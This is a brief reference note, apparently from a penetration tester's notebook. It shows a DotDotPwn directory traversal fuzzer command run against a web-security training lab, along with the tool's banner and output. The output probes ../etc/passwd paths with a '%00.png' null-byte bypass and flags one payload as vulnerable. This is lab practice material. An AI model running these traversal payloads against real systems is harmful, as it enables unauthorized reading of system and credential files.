dotdotpwn

Reference

Code:

perl ./dotdotpwn.pl -m http-url -h https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/ -u https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=TRAVERSAL  -k "root" -e "%00.png"

Example:

┌──(eo㉿offsec)-[~/Tools/dotdotpwn]
└─$ perl ./dotdotpwn.pl -m http-url -h https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/ -u https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=TRAVERSAL  -k "root" -e "%00.png"
#################################################################################
#                                                                               #
#  CubilFelino                                                       Chatsubo   #
#  Security Research Lab              and            [(in)Security Dark] Labs   #
#  chr1x.sectester.net                             chatsubo-labs.blogspot.com   #
#                                                                               #
#                               pr0udly present:                                #
#                                                                               #
#  ________            __  ________            __  __________                   #
#  \______ \    ____ _/  |_\______ \    ____ _/  |_\______   \__  _  __ ____    #
#   |    |  \  /  _ \\   __\|    |  \  /  _ \\   __\|     ___/\ \/ \/ //    \   #
#   |    `   \(  <_> )|  |  |    `   \(  <_> )|  |  |    |     \     /|   |  \  #
#  /_______  / \____/ |__| /_______  / \____/ |__|  |____|      \/\_/ |___|  /  #
#          \/                      \/                                      \/   #
#                              - DotDotPwn v3.0.2 -                             #
#                         The Directory Traversal Fuzzer                        #
#                         http://dotdotpwn.sectester.net                        #
#                            dotdotpwn@sectester.net                            #
#                                                                               #
#                               by chr1x & nitr0us                              #
#################################################################################

[+] Report name: Reports/0ab800e204755c80c049142e009d00d3.web-security-academy.net_11-21-2022_23-19.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: 0ab800e204755c80c049142e009d00d3.web-security-academy.net
[+] Protocol: https
[+] Port: 443

[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (unix)
[+] Including Special sufixes
[+] Appending the file extension %00.png to each fuzz string
[+] Traversal Engine DONE ! - Total traversal tests created: 11052

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[+] Replacing "TRAVERSAL" with the traversals created and sending
[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../etc/passwd%00.png
[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../etc/issue%00.png
[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../../etc/passwd%00.png
[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../../etc/issue%00.png

[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../../../etc/passwd%00.png <- VULNERABLE
